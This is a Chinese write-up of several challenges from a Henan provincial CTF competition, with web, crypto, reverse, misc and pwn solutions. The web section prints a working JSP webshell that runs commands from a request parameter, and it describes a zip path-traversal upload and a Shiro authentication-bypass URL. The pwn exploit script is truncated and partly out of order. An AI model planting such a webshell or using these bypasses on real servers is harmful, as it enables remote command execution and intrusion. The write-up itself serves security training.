河南省第三届金盾信安杯网络安全大赛部分wp

河南省第三届金盾信安杯网络安全大赛

公众号:Th0r安全

文章目录

  • 河南省第三届金盾信安杯网络安全大赛
  • Web
    • 上传你的压缩包吧
    • 休想爆破我
  • Crypto
    • Hi There
    • 低音吉他谱
    • 未完成的宣传图
  • Reverse
    • Re2
    • Re3
    • Re5
  • Misc
    • 潦草的笔记
    • 这可是关键信息
    • hello-world
  • Pwn
    • pwn2


Web

上传你的压缩包吧

上传之后会解压 zip,上传一个 jsp 马然后压缩传上去:

<%
if ("feng".equals(request.getParameter("pwd"))) {
java.io.InputStream input = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
int len = -1;
byte[] bytes = new byte[4092];
out.print("
");
while ((len = input.read(bytes)) != -1) {
out.println(new String(bytes, "GBK"));
}
out.print("
"
); } %>

再访问会提示不行,应该是 upload 目录不可以,尝试压缩包穿越,拿 010 改:河南省第三届金盾信安杯网络安全大赛部分wp_第1张图片
再上传上去访问 1.jsp 即可 rce,然后读 flag.jsp 即可。

休想爆破我

湖湘杯原题,下载 heapdump 然后其他的操作都和湖湘杯一样了,链接:
https://blog.csdn.net/meteox/article/details/121334507
给了 pom.xml,shiro 版本 1.50,扫描目录发现有/actuator 文件,但访问其中的文件就重定向到login 结合 shiro 鉴权绕过可以成功访问到。
http://f027f9e4.lxctf.net//;/actuator/env
然 后 可 以 下 载 heapdump 文 件 , 可 参 考 文 章 提 取
keyhttps://www.cnblogs.com/icez/p/Actuator_heapdump_exploit.htm河南省第三届金盾信安杯网络安全大赛部分wp_第2张图片找到密钥后进行还原

import base64
import struct
str=base64.b64encode(struct.pack(',25,56,-57,73,111,12,-81,57,36,114,15, 13,84,-56,-96,-89))
print(str)

然后直接用工具打就行河南省第三届金盾信安杯网络安全大赛部分wp_第3张图片

Crypto

Hi There

密文:Hhbe1cie93bfTFbcc2hl94e2ea1c91rgab5fei3432Tse498
栅栏,经过测试是 8 位偏移
河南省第三届金盾信安杯网络安全大赛部分wp_第4张图片
解密出:HiThereTheFlagisb9b91a3ee3c4cb441bce9539cf221f28
flag{b9b91a3ee3c4cb441bce9539cf221f28}

低音吉他谱

拿到密文:

KIYVK6KWIVWE6V3MLJEVEVCOKVKDANKLKVKWIYKRNNJE4VKWOBMFGVLLPFLEK5CPKNWFMSC
WKRHEKUZQGFBVM23IIZLWYUSEKRVUUWCSGFDGCVSFORHFK3DEJJJVISSFKJKTCYKVNNSFMTJRKJ
GFIVTQK5JVKVLZKZCTCT2VNRFEQV3LJJCVIMBVINLFK3CKJVVVMSSUKZYFGURRKV5FERLUJZJWYZC
IKZKEUVKTGAYWCV2VMRHE4RKSJZKFM4CWKIYVK6KSIVLE4V3MKZEFMVCOKVKFKOKLKZVWIWSN
GFLEIVDMJJMFEMKVGBJEK3COKVWFMSKSKRFFKUSVGVKFCMDELJHEKUSQKRKUUWCSGAYHSVSF
ORHVKMCSJBKVM4CFKMYDCQ2WGBWE4TJQKJEFIVTQLFJDCVTBKZCTCUSTNRLEUVSUJJKVIVJVJNL
UKZC2JZDFETSVKZYFOURQKV4VMVKOJ5KTASSIKVVUMVKTGA2WCVRQMRHFO3CSIZKGWTSDKIYD
A6KSIVWFEU3MLJEFKVCOIVJVKNKTK5VWIVSNNNJEYVDLJJKVEMCVPFJEK5CPKNWFUSCWKRFEKU
ZRIZFVMMDIIJGWWVSMKRWE4R2SGFKTAVSFHFHFG3CWJJJVISSVKRKTKU2XKVSFETSGKJGFI3DQL
BJVMRL2KZCUMT2RGBNEQVSUJJKVGVJVMFLGWZCWJUYFMSSUNRFFQURROBCFMRJRKJLWYZCJK
FKEUVKUGA2VIUSVMRLVCVSSJJKGYSSXKIYUK6SSKVSE6ULMJZEFK22GKVJTAOKDKYYGYVSNGBLEQ
VDLJJKVEMKVPFLEK3CPKNWFMSKSKZYEMVCVGVFVORLEMFIVMUSIKQYHAVSTKVVXSUSVGFHVG
3DEJBKWWRSVKRKTKYKWGBSE4TLLKJHFI22KKRJDC4CDKZCXITSTNRLEQVSUJZKVGVJRMFLVKZCWJ
ZDFETSVKZYFQURRIV5FERSOJ5KWYZCIK5VUUVKTGAYVGVRQNRFE2MCSJBKGUSSDKJ5FCMCSIVW
E6V3MMREFMVCKKVJTANLBKZKWGMKRKZJE4VDMJJLFEMKWMFLEMRSPK5WEUSCWKRFEKU2V
GVQVMRLIIJLWYUSQKRVU4RCSGAYWCUSFNRJVG3C2JBJFISSWKEYDKVCRNNSFGUKWKJGFIMCKK
ZJVMVL2KJKWYT2TNRHEQV2UJZKVGMBRJNLFKZC2JUYFEUCUNRYGCURRKZNFMRJRKNJWY2CIKV
KE4VKUKU2VGVJQMRHFOVKSJZKVM4CXKNKVK6SSIVHE6VJQJJEFKVCKKVJDANKDKZKWYTSNNRJE
YVDMJJLFEMKFPFJEK3CTKNWFMSKRKRHEMVCVGFQVM23EKZGWYUSKKRWHAV2TIVKXUVSGJZH
VG3DEJBKVITSVKMYDCU2WGBWEUTLMKJGFI23QLBJDCVJQKZCWITSXNRSEQVCUJZDFGVJVIRJGW
YZQJZDFESSVNRFFMURQGB4VEVLUJZLWYUSIKZLGYVKSGAYUGVSVMRFE23CSIJKGWTSGKIYVK6K
WIVWE6VLMMREVEVCKIZJTAMLBKVVWIVSNGBJFAVCVJJLVEMKGMFLEKTSPKFWE4SCOIZWEKUZQ
HFFVM23EKZGTCUSCKRVXAYKSGFKXSVSFMRHFG3DEJBKFM4CVKQYDKS2WNNSFUTSGKJHFIMCKK
5JHUUL2KJCVMT2TNRUEQVCUJJKVGMBZINLFK3CSJVVVETSUNNFFQURRIV5FMRLUJZJWYUSIKFKE
4VKTKU2UYULLMRLFO3CSJZKVK4CYKIYUK6KWIVSE6VLMKJEFMVTQKVJTANKTKZVWIRSNNRLEIVD
MJZBVEMKKIJLEK5CPKFWFUSKSKRHEMURQGVQVKVLEKJLWYUSOKRKXAVKSGBVXSUSVJZHFO3DE
JBLFITSVKMYDKYKWNNWEMTLLKZGFI23UINJDAMK2KZCXIT2VNRLEUVCUJZCVGMBVINLUKZCSK5
LFETSVKVYFOUT2KF4VMRJRJ5KWY3CIKVKFERKTGA2VGVRQNRHE222SJRKGUSSDKIYVK6KWIVWE
6U3MMREVCVCOKVITANKLKZKWIUSNGBJEYVCWJJLFEMKVPFLEK3CPKUYFESCVNNDFKVBQGVQV
M23EJJGWYUSMKRLHAU2SPJIXUVSFNRIFG3CSJBJVISSGKMYDKYKXKVSFOUKWKJGFI3DQKVJUKVT
BKZDEMT2TNRLEQVKUJZCVIMBRINLGWYZQJUYFETSUNNFFUUT2KF4VERLMKJLWYWSJKFKE4RSS
GA2UGVJQMRQVC3CSJRKFK4CWKIYVK6SSIZDE6VLMJJEFMVCOIVKFMRSTKZCWIVSXNRJE4VDMJJJ
VEMLQINJEKMKPKFWFMSSUKRHEKU2VGR4VC23EKNITCUSOKRWEUVSTKZCXSVSFORHVO3CWJB
HEIUSFKNLEMU2XIVUEMTLMKJHFI3DQKJJDCVLZKJCTCU2RNRUEQVKUJJDFGMBVIRIWWZCWK5W
FEUCUKVFFOURQKV4VMRLEJ5IWY2CIJZCEURKTGAYWCVSVNRLE2MCWIZKGWTSDKIYVK6KWIUYU
4V3MLJEFOVCOIVKVKNKUKEYGIVSXNRJEUVDLOBLVEMLLPFJEKZCPKNWEMSCXNNHFKU2VGVJVM
VLMLJGWYUSEKRVUUV2SGFVTAUSFMRHFO3C2JBKVM4CVKJKTKS2VGBSFGUSFKJGFIVSKKZJUKRT
BKZCXIT2XNRWEQVSUJJKVGVJVMFLGW2CGJUYVEUCUNNYFEURROBBVERJRKJLWYWSIK5KE4RKS
GA2VIUTLMMYE4RKSJJKGY4CXKNKVK6KSIUYU6ULMOBEFO22OIVKFKNKLKYYGYVSXNRJEUVDMO
BNFEMK2IJLEK3CPKVWFMSKSKRHFKVKVGVJVKMDEKZGTCUSIKRKXAVSTKVVXSUSVNRHVC3DMJB
LVIUSFKNLEMS2WGBSFETLMKJHFI22KKRJDCRJQKZCXIT2TNRNEQVSUJJKVCMBRMFLWWZCWK5W
FESCUKZYFKURRKV4VMRSGJ5KWYZCIKZKE4VKUGA4UGVSVMRLE2MCSJRKFM4CSKIYDCWSWIVSF
AULMLJEVCVTQKVJFKNKLKUYGIWSNGBJEUVKWJJKVEMDLPJJFKVSOK5WFESCWKZYFKU2VGVBVM
MDIIJGWWUSEKRVUUYKSPJLEEVSFORHFK3C2JBJFISSVKUYDI6KRNNSFGUJRKJFFI22KK5JDAVTBKZC
U4T2VGBSEQV3LJJKVIVJRMFLEKZCOK5WFEQSUKZYFUURRKZQVMRJRKJJWYZCKKRLHAVKRKU2VG
VLLMRLE2MCSJJKGYSSWKNKTA6SSIVSE6ULMNREFIVTMIVJDANKDKZVWQRSNGBLEMVDMJJMVE
MBQPFLEK5COK5WGISSUKRFEKUZQGVKFC23EKZGWYUSKKRVXAVSTKZKXSVSVJZHVK3CKJBKFM4
CVKNKTKU2WNNSEMTLLKZDFI23QKZJDC4CDKZCVMUSVNRNEQTSEJJCVGMBRMFKWWZCTKFWFE
TCUNRFFQU2WKV4VMRJRJ5IWYVSIKZKFEVKTGA2UGVRQNBBE2MKSKBKGW4CXKIYVK6KSIUYU6U
LMLJEVEVCKKVJDANKDKYYGGMCXKVJFAVKVOBMFEMDLPJJFKZCPKFWE4SCXNNHEKU2WJJBVMM
DMIZGWYUSMKRLHAV2SGFLGCUSFORHVO3CSJBIVITSVKVKTKRCSGBSE4V2WKJGFKVLQK5JDCRLZ
KJKTCT2RNRNEQV2UJJCVIMKGJNLFK3CSK5WFERSUNNHEGURRNMYFERLMKJLWYWSJKFKE4RKUG
A2WCV2VMRLE2MKSJJKGW4CZKJ5FC6SSKUYU6VLMMREFO22GKVKDANKDKZVWIRSNNRJEIVCW
OBKVEMKKIJLEK5CPKVWFMSSWKRFFKUZQGVFVKMDEKNITCUSOKRVUUWCTIVKXUVSFNRHVO3C
WJBLFITSFKQYUMS2WIVSEETJRKJKFI3CKKVJDCRTBKZCXITSVNRNEQV2UJZCVIVJVKRJEKZCOJVVVET
SVKZFFQURQGB4VERLUJ5KWY3CIKVKFERKTKZFEWVTLMRLE222SKRKFM4CXKIYVK6KWIVWE6V3
MLJEFOVCOIVJTANKTKZVWIYKRGFJFAVCVJJMFGVKVPFLEKMKPKFWGISCXKRJEKURQGVBVMMDEJ
JLWYUSGKRVUUWCSGAYHUUSFORHVG3DEJJKVITSGKJKTCYKXKVSFMTLLKJHFIMDQKVJDARL2KZD
EMT2TNRDEQVCWOBKVGMBVKNLFK3C2JUYFERCUKZYFGURRKZQVERLMJ5IWYZCIKZKEUVKUKU2
UGVJQMRJE4RSSJRKDA4CXKJ5FC6KWIUYU6VLMNREFMVCOIVKFMRTBKZCWIUSNGFJFIVDMJJLFE
MLQIRLEKOKOKFWGISSUKRFFKU2VGVBVORLELJHEKUSOKVLHAWCSGAYHSVSFGFHVO3CGJBLVIUS
FKNKTSS2WIVSEETLLKZCFI23QKRJDCVTBKZCTCUSTNRLEUVSUJJKVIVJVJNLGWZCSK5WFESSUNRFF
OURQKV5FERKOJ5JWY2CIKVKE4RKTKZDFGVTLMRNE23CSJZKGYTSFKIYXARCSIUYU4VLMMRFFKVC
KKVKTANKUKJKWIVSOIZJFAVKVOBLVEMDLPFJEKVSPKNWFMSCUKZWFKU2VGFJVMMDIIZGWYUSQ
KRWE4RSSPJITAUSFMRHFG3CWJJJVM4CVKFKTKRCSNNSFMTJQKJHFI23QLBJVKVTBKZDEMT2XNR
HEQVSUJJKVGVJVMFLDA3COJUYFEUSUNNYFKURRKUYFERLMKNJWYWSIKVKEURSTGA2UWVTLMR
NE222SJJKFK4CWKNLFMYKWIVDE4V3MIZEFIVCSIVKFKMLBKZVWQQSXNRJEYVDLOBNFEMKWMFL
EKMKTKNWFESCWKRFEMU2VGVFVK23EMFIWWUSQKQYEUV2TIVCXSVSGIZHU222KJBKFISSVKIYD
SQ2WNNSEUV3MKJCFI22KKRJDC4CDKZCWYUSVNRLEQVKUJJCVCMBVMFLWWZCWJZDFETSVNNY
FQU2FIV5FMRLEJ5KWYUSIK5VU4VKUKU2UGVSVNBBE23CWIRKGUSSDKIYDAMCWIUYVGVLMLJEF
MVCOIZJDANKUKEYGITSNGFJE4VCVOBLVEMBQPJJEMRSPKNWGISCWKZYFKU2VGVBVMMDEKJLW
YUSOKRWEUU2SPJLEEVSFMRIFG3C2JBJFISSWKEYDKS2WIVSFOUKWKJDFKVSKLBJDC232KJKWYT2
RGBFEQVSUKJCVGMBVKNLGWYZQJUYVESCUKZYGCURRKZQVMRLMJ5IWYZCJKFKE4VKUKU2UWVJ
QMRQVCVSSJJKVK4CXKIYEK6KWIVHE6ULMKZEFMVTQIVJVKNKLKYYGIUSNNRJE4VDMOBJFEMKFP
FLEKMKPKFWFUSCVKRHEKVKVGVFVK23EKZGWYUSKKRWHAV2TIVKXUVSGJZHVG3DEJBHFKRSVK
MYUMS2WGBWEUTLMKJKFI22KLJJDAMDZKZCWYUCRNRSEQVCUJZDFEMBVKNLEKZCOJUYVETCU
GBYFOUT2KF5FMRLMJ5LWY2CIKZKFEVKUKZFEWVTLMRNE2MKSJZKGW4CUKIYVK6KWIVSFAU3M
LJEFOVCKKVJVKMLBKVVWIUSNNRJFAVBQOBLFGVTLPFLEKMKPKFWEUSCOIRFEKUZQGVFVMMDM
JZGWYVSEKRWE4RCSGFKTAVSFORHVC3DEJFIVISSFKMYDKU2WNNSE4V2WKJFFK23QLBJVK23ZKZ
CXIT2TNRNEQVCWNRKVGVSKJNLDAZCGJVVVETCUNNFFOURROBBVERLUJZKWYVSIKVLHAVKVKUY
WCVSFMRLE23CSJBKFM4CZKJ5FC6SSKUYU6VLMLJEFMVCOIVKFKOKDKZVWIRSNNRLEIVDLJJMVE
MLMMFLEKOKPKFWFUSCTKRHEMU2VGVBVO23EJZLVMUSMKVKXAVSSGFKXUUSFMRHFO3C2JBL
FM3CVKRLEUS2WGBRTATJRKJDFI22OI5JHUVSCKZCWITSTNRNEQVCUJJDFCMBVKRJEKYZQK5KVES
CUKVYFOU2VKV4VERLUJ5LWYRSIKZKE4RKTKZFEGVSFMRDE2MCWIZKGY4CWKIYVK6KWIVWE6U3
MKZFFMVCOIVKVKNKLKZVWIYKRNNJEUVDMJJMFEMCVPFLEKTSPKUYE4SCXNNFFKU2WIZQVM23
ELJGWWUSMKRLHAU2SGFVXUVSFGFHFK3CWJBHEM4CVKUYDKQ2WKVSFMV3MKJHFK23QK5JDC
VTBKZCVMT2TNRLEQTSVIZKVGMKGJNLFK3CKJVVVMTCUKZYFEURQGAYFMRLUJ5KWYVSJKJKEUVK
UKU2UGVJQMRJE222SJZKFK4CWKIYVK6KSIUYU6VJQKJEFMVTMKVJDAMKLKZKWIWSNGFJEUVDM
JJLVEMKVPJLEKMKQKFWFMSSWKRFFKUKVGVFVM23EKZLWWUSKKVWEUV2TKVKXUUSVNRHVG3
COJBLVITSFKRKTCS2WKVSFMTJQKJEFIVSOIRJDCVL2KJCWITSRNRJEQUSUJJKVCVJVIRITAZCWJVVVE
TCUNRFFOURQKV4VEVKOJ5IWYUSIJZCEURKTKZDEWVTLMRFE222SKBKGWSSXKIYDCYKWIUYU6VL
MKZEVCVCKKVKFKNKUKJCWIVSNNRJEUVDLJJMFGVLLPJJFKTSPKVWFMSCWKRHFKUZRIZFVM23MI
ZGTAUSEKRVXAWCSGFLFUVSFHFIFC3C2JBIVITSGKNKTKS2VNNRTATSGKJGFKVLQK5JDCVTBKZCU4T
2VGBSEQVSUJJKVGVJVJNLFK3CWJUYFMTSUNNYFGURRKV5FMRLUJ5KWYVSIKZKE4RKSGA2UGVSV
MRLE2MCSJJKGYSSXKNCVK6KSIUYU6VLMNREE4RTMKVJTANKDKZVWIUSXNRJEIVCWOBQVEMKVP
FJEKMKSKVWFMSCTKRHFKUKVGVFVKVLEJZLVKUSIKQYHAV2TIVKXSVSFMRHVG3C2JBKFM3CVKMY
DCYKWNNSFMV3MKJCFI22KKRJDC4CDKJCTCTSTNRNEQTSEJZKVCVJVKNKWWZCWJUYFETCUGBFF
SURQGFQVMRKWJ5JWYUSIKZLHAVKUKU4UGVTLMRDE222WIZKFM4CVKIYWYYKWIU4U6V3MKZF
FOVTQKVIVKNLBKZKWIWSNGBJEYVDLOBLFEMKVPJJEMRSPKMYEUSCWKZYFKVCWIZFVMMDEKJG
WYUSIKRWEUVKSGFYEEVSFORHFK3C2JBJFISSWKEYDKVCRNNSFEV2WKJDFKVSKK5JDAMDZKZCTS
T2TNRHEQVSWOBCVGVSKJNLGWZC2JVWFEVCUNRYFSURRKV4VERJRKNJWYVSIKNKEURKTGA2U
WVTLMRNE4RSSKBKGWSSWKNLEK6SSIVSE6VJQKZEFOVCSIVKDANLBKYYGIUSNNNJEYVDMJZEFE6
SWIJLEK5CPKVWFUSCXKRFEKUJQGVJVOVLEKZGWYUSKKRVXAVSTKZKXUUSGIZHVG3C2JBLFITSFK
MYUMS2WNNUEETLMKJBFI23QKVJDCVJQKZCTSUCTNRNEUUSWOBKVCVJVKNLVKZCSJUYVETCUK
ZYFMUT2KF5FEVLEJ5LWY3CIKZLHAVKTGA2UWVSVMRLFO22WIZKGW4CYKJ5FMQSWIU4U6ULMK
ZFFGVCKIZJVKMLBKVVWIVSNGBJE4VCVOBLFGVLLPFLEKMKPKFWE4SCXNNHEKU2WJJBVMMDMJZ
GTAUSIKRLHAV2SGFLFUVSFMRHFG3CWJBLFITSGKNKTKRCSKVSFETSFKJFFIVSKK5JDA23ZKJDE4TSX
NRHEQVCUJJKVIMBVMFLGWZCSJUYFMSSUNNHEMURQGFQVERLUJ5IWYWSIJZDHAVKTGA2VGVT
LMRLE2MCSJRKGW4CZKJ5FC6SSKVLE6UJQLJEFMVCOIVKDAMKDKZVWIRSNNRLEIVDLOBKVEMK2I
JLEKVSSKVWGISCWKRFFKVBQGVBVMMDELJLVMUSMKVKXAVKSGBCXSUSFGFHVK3C2JBLFISSVKQ
YUMS2WKVSFUTLMKJIFI22OI5JDC4CDKZCWYT2VNRNEQUSUJJKVCMBVKRIWWZCOJZDFETSUKVY
FOURQIZQVMRKGJ5LWYRSIKZKE4VKUKUYWCVRQNRJFO3CSJJKGYTSEKIYVK6KWIVWE6V3MKZFFK
VCOKVKVKNKEKEYGGMKRKZJEQVCVOBLVE6SRPFLEMRSPKUYEUSCVNNDFKU2VHFBVM23EIZLWY
USGKRVXAVCSGAYVUVSFORJFG3CWJBLFITSVKIYDCVCRGBSFMV3LKJIFIMDQK5JVKVL2KJCXIT2VNR
HEQVCWOBCVIMBRINLFK3C2JUYFERCUKZYFEURQGFNFMRJZJ5LWYWSIK5KE4RSSGA2UGVJQMRJ
E4RSSJZKFK4CZKNKVK6KSKV2E6V3MJJEFMVCOIVKDCRSLKZCWIRSNGFJEYVDMJJKFE6SWIJLEK5CS
KNWFUSSSKRFFKUSVGVFVMVLEKZLWWUSOKVKXAWCSGFVXSUSFORHVK3CSJBLWWSSVKNLEUU
2WKVSFMV3MKJKFI22KKNJDCVJQKZCTSUSTNRSEQVCUJZKVIMBVIRIWWZCSJZCVETSVKZFFKU2WI
U4VAVBQHFIFIMB5

按照顺序进行:
base32 解码, base64 解码,base32 解码,base16 解码,base64 解码,发现:

Pf0>IdQ5OcQBF@uY&UjKJ3UPyO<p@xZ%s}pHFHiqIA>W;J3UZ)Pf2Vsbx%7bM=DQ6a6v*)XHZjMPe
&~yaZfENPI^yBPB?Z?J9R`pPe@K|bWb~Tds<FyKs|O*Lo;+cPf2W6d`@X2B{ooIYj18-GC4z9Pf2TddQ
V7rcr8#wC@O1Ab7UiOPiaJXSW;R(VmnW0QFCKYJ7Rq%Pf2SbZBkbzYfMgUKx`#YXGVQ3PHjLTDNR
pEMp#cqeo|LZV|{K^Pe@HZVNzjGKw3_1Kq+%iNkM%*PHkR6BTqXdHEB>qN@HwOdND~qPf0>IU
r|FdR&z~1dR1mmJ0xIuPHQD=K~W}lD{M|_d_+i7H8@#4Pc3CCZ%s}
azRi<N-1?uNkTCyPHaeaV^2vzeLheqZa#BQJ3UP!PiaJUYfnf&c4AOPbZlu+CUz?+PiaIsS5G@7M|GPe(02bxlrwGg?hRY;i(UH7zk?Pe&~~bWUk=H8oF2O@4DuZDu8PPf2W6d`~GrW;akp
buoEOUOQ29P-RVda8D{SdQMMhA$D?7S|(yXPdg-Fb5dG9Bx+7=R&ZudJU3Y-PCaRAZBIKTM`loCJu
6O6J7OU!PChAeCQmyhM=DNfd_hG>WMO)5P$+IDa7|ueP9#ufYiT1>d2eMhPChAeDp5E`XjM=}N
@i?OXIMRSPdijZU{6I(P+w0;K_PHYJ7Rr4Pf0>IdQ5V0NpDR+LrhptJ3UP!PCaQVW=&2gHFHiqIA>W;J
3UZ)Pf2W9CQ&0pQ#npNc6Mn^UL$5ZPe&~yaZgA^S1V6QPB?Z?JVrn$Pc1+=V^2GCdudK>G&^ojN
kMpVPHk3jW=no6YE4c|G%8O@c70$y

河南省第三届金盾信安杯网络安全大赛部分wp_第5张图片
再进行 base 一把梭得到 flag:380a4d5bea49d6a00921d4ed26b9d4ab河南省第三届金盾信安杯网络安全大赛部分wp_第6张图片
flag:flag{380a4d5bea49d6a00921d4ed26b9d4ab}

未完成的宣传图

打开 20211125.tmp 文件,发现全是坐标河南省第三届金盾信安杯网络安全大赛部分wp_第7张图片
联想提示:设计师离职,交接当前未完成的工作,其中需求为: 1. 宣传图需要
重新设计为矢量图 2. 添加联系方式的二维码
采用 matplotlib 绘图脚本,将文件改动样式并放到 txt 文件中
河南省第三届金盾信安杯网络安全大赛部分wp_第8张图片
脚本:

import matplotlib.pyplot as plt
import numpy as np
x, y = np.loadtxt('C:/Users/lenovo/Desktop/1.txt', delimiter=',',
unpack=True)
plt.plot(x, y, '.')
plt.show()

结果为二维码
河南省第三届金盾信安杯网络安全大赛部分wp_第9张图片
微信扫码得到 flag河南省第三届金盾信安杯网络安全大赛部分wp_第10张图片
flag{1e52c4c05dcff5fcc54b64e21bcbdc9e}

Reverse

Re2

  1. 看一下 main 函数河南省第三届金盾信安杯网络安全大赛部分wp_第11张图片
    先找一下逻辑河南省第三届金盾信安杯网络安全大赛部分wp_第12张图片
    河南省第三届金盾信安杯网络安全大赛部分wp_第13张图片
    这个 call 很不正常,看一下,是一个函数,main 函数是他的参数河南省第三届金盾信安杯网络安全大赛部分wp_第14张图片
    然后这一串也很可疑,查看一下,大致就是先运行 main 之前的函数,然后一顿操作(rc4,异或,base 变种河南省第三届金盾信安杯网络安全大赛部分wp_第15张图片
  2. 运行程序看一下,能看到有一个时间提示,但是是个假时间,真的。。。。
  3. 脚本爆破
#include 
#include 
int main() {
for (int i = 1609448160; i < 1671742560; ++i) {
int seed = i;
srand(seed);
if (rand() == 1515432825) {
printf("%d\n", seed);
break;
}
}
return 0;
}
  1. 爆一下 seed 值,直接修改 eax 的值为 seed 的值,然后选择好解密的位置创建一个解密函数即可
for (i = 0; i <= 41; ++i) {
a3 = *(&key1ptr + i) ^ *(i + a1);
if (a3 != *(&key2ptr + i))
break;
}
result = i;
v5 = __readfsqword(0x28u);
v4 = v5 ^ v91;
if (v5 != v91)
result = (unk_559E)(a1, a2, a3, v4);
return result;
}

创建的函数省略(因为创建的变量太多,只留下最后的关键部分)正向顺序解密有点麻烦,因涉及到随机异或(好吧,是我太烂了)把上面的 key1 和 key2 提取出来做一下异或,直接出 flag

key1 = [61, 159, 9, 29, 146, 126, 169, 130, 106, 19, 233, 31, 142, 51, 80, 143, 113, 7, 29, 251, 28, 209, 237, 15, 152, 82, 22, 39, 215, 245, 155, 56, 89, 220, 239, 87, 82, 180, 252, 235, 117, 11, 91, 243, 104, 122, 233, 77, 203, 225, 93, 39, 217, 126, 187, 30, 103, 187, 21, 62, 48, 207, 126, 225, 136, 34, 249, 102, 115, 23, 250, 150, 250, 94, 111, 236, 214, 53, 101, 215, 205, 136, 69, 118]
key2 = [91, 243, 104, 122, 233, 77, 203, 225, 93, 39, 217, 126, 187, 30, 103, 187, 21, 62, 48, 207, 126, 225, 136, 34, 249, 102, 115, 23, 250, 150, 250, 94, 111, 236, 214, 53, 101, 215, 205, 136, 69, 118]
str = '' for i, _ in enumerate(key2):
str += chr(key1[i] ^ key2[i])
print(str, end='')

河南省第三届金盾信安杯网络安全大赛部分wp_第16张图片

Re3

原题,参考链接:https://blog.csdn.net/dyllove98/article/details/9018453
SSE4.1 指令集中的指令及其在视频编码中的应用。 整数格式转换,例如,把一个 8 位的字节型变量转换为 16 位字变量,或者 32 位的双字变量等。这种运算在图像,语音信号处理中的经常碰到。例如,图像数据是 8 位的字节 型变量,如果运算过程中的浮点变量定点化采用的 Q15 格式,则需要将 8 位无符号扩展为 16 位以适应 SIMD 的并行运算,如果为了更高的精度,Q15 格式显然太低,例如采用 Q24 是一个不错的选择,这时候需要将 8 位无符号扩展为 32 位双字变量以适应 SIMD 的并行运算。
SSE4.1 提供了 12 条不同的指令来完成各种不同整数格式之间的转换。运动估计占视频编码 30%以上的时间,采用 SSE 的 SIMD 指令可有效加速
运动估计的计算过程

int blockMatch4x4(const unsigned char* refFrame, int stepBytesRF,
2 const unsigned char* curBlock, int stepBytesCB,
int* matchBlock,
3 int frameWidth, int frameHeight)
4 {
5
6 int lowSum = INT_MAX;
7 int i,j,k,l;
8
9 int temSum = 0;
10
11 int blockHeight = 4;
12
13 int blockWidth = 4;
14
15 const unsigned char *pRef, *pCur;
16
17 for (i = 0; i <= frameHeight - blockHeight; i++)
18 {
19 for (j = 0; j <= frameWidth - blockWidth; j++)
20 {
21 temSum = 0;
22 pCur = curBlock;
23 pRef = refFrame + i * stepBytesRF + j;
24
25 for (k=0; k < 4; k++)
26 {
27 for (l=0; l < 4; l++)
28 {
29 temSum += labs(*pRef-*pCur);
30 pCur++;
31 pRef++;
32 }
33 pCur += stepBytesCB - 4;
34 pRef += stepBytesRF - 4;
35 }
36
37 if (temSum < lowSum)
38 {
39 lowSum = temSum;
40 *matchBlock = j;
41 *(matchBlock+1) = i;
42 }
43 }
44 }
45 return 0;
46 
a = [
0x19, 0x13, 0x1E, 0x18, 0x04, 0x31, 0x14, 0x26, 0x4F, 0x32,
0x2B, 0x32, 0x4B, 0x31, 0x2B, 0x36, 0x4E, 0x32, 0x14, 0x36,
0x06, 0x32, 0x2A, 0x2D, 0x3B, 0x2D, 0x15, 0x2E, 0x4E, 0x30,
0x3A, 0x26, 0x4A, 0x30, 0x3A, 0x2E, 0x4F, 0x2]
for j in range(len(a)):
print(chr(127^a[j]),end=&apos;&apos;)

flag{NkY0MTM4NTI1MkIyMURDRjQ1OEY5OEQ0}

Re5

re6
拿到附件,先运行看一下,没回显,进工具查一下壳,32,无壳
河南省第三届金盾信安杯网络安全大赛部分wp_第17张图片
河南省第三届金盾信安杯网络安全大赛部分wp_第18张图片
主函数里面没有明显的核心代码,但是他有一个输入函数,跟进调试一下,最后调了一会,确实输入不是在 main 函数,接下来就找其他的输入函数河南省第三届金盾信安杯网络安全大赛部分wp_第19张图片
可以看到这里还有一个输入函数,再试一下,就是一个亦或提取他的字符串,直接码脚本就行了
河南省第三届金盾信安杯网络安全大赛部分wp_第20张图片
河南省第三届金盾信安杯网络安全大赛部分wp_第21张图片
在这里插入图片描述
脚本

e='Vm0weGQxSXhiRmhUV0doV1YwZDRWRmxVUW5KWl'
d=[0x30,0x01,0x51,0x10,0x1E,0x1E,0x05,0x32,0x04,0x16,0x3D,0x50,0x20,0x0
9,0x5B,0x39,0x0E,0x52,0x33,0x07,0x24,0x68,0x35,0x25,0x29,0x0A,0x04,0x06,
0x2B,0x09,0x30,0x18,0x00,0x1A,0x63,0x3B,0x10,0x11]
for i in range(len(e)):
print(chr(ord(e[i])^d[i]),end="")

Misc

潦草的笔记

一张被二维码遮盖的图,脚本跑,不对,发现上面的命令是可以猜测出来的
/usr/bin/head -n 1 /etc/passwd | /usr/bin/awk - F:’{printf $1}’ | /usr/bin/
linux 的命令,联想到 password 密码,猜测为 md5 编码类型,linux 中最高密码权限一般默认为 root,然后对 root 进行 md5 加密 ,出来的结果刚好跟图片中对应河南省第三届金盾信安杯网络安全大赛部分wp_第22张图片
flag{ 63a9f0ea7bb98050796b649e85481845}

这可是关键信息

根据给出的提示:[email protected],在 github 上社工下发现发布了东西,链接:https://github.com/p1n93r/qingteng-wblab/blob/0490a4b62339020331624c22e3e5fc6a1ca3e8c4/qingteng-wglab/README.md
然后发现一个解释,迷迷瞪瞪的河南省第三届金盾信安杯网络安全大赛部分wp_第23张图片
不对,然后往前看了下发现一张 gif 图片 logo.gif 和一个 README.md,记事本打开图片,发现 flag河南省第三届金盾信安杯网络安全大赛部分wp_第24张图片flag{0b6db90034ac4494956679a100e236fc}

hello-world

在图片属性值发现 hex 编码河南省第三届金盾信安杯网络安全大赛部分wp_第25张图片
密文:

666c61677b35383561626436653435316134623466393665636630343036303136376264397d

进行 hex 解码得到河南省第三届金盾信安杯网络安全大赛部分wp_第26张图片
flag:flag{585abd6e451a4b4f96ecf04060167bd9}

Pwn

pwn2

河南省第三届金盾信安杯网络安全大赛部分wp_第27张图片
Checksec 后直接 gdb河南省第三届金盾信安杯网络安全大赛部分wp_第28张图片
有个栈溢出
Exp

from pwn import * p = process('./babystack')
context(arch = 'amd64',log_level = 'debug')
puts_got = elf.got['puts']
elf = ELF('./babystack')
puts_plt = elf.plt['puts']
pop_rdi = 0x0000000000400813
leve_ret = 0x0000000000400701 # leave ; ret
ret = 0x000000000040053e
read_plt = elf.plt['read']
main = 0x400677
pop_rsi = 0x0000000000400811 # pop rsi ; pop r15 ; ret
p.recvuntil('name\n')
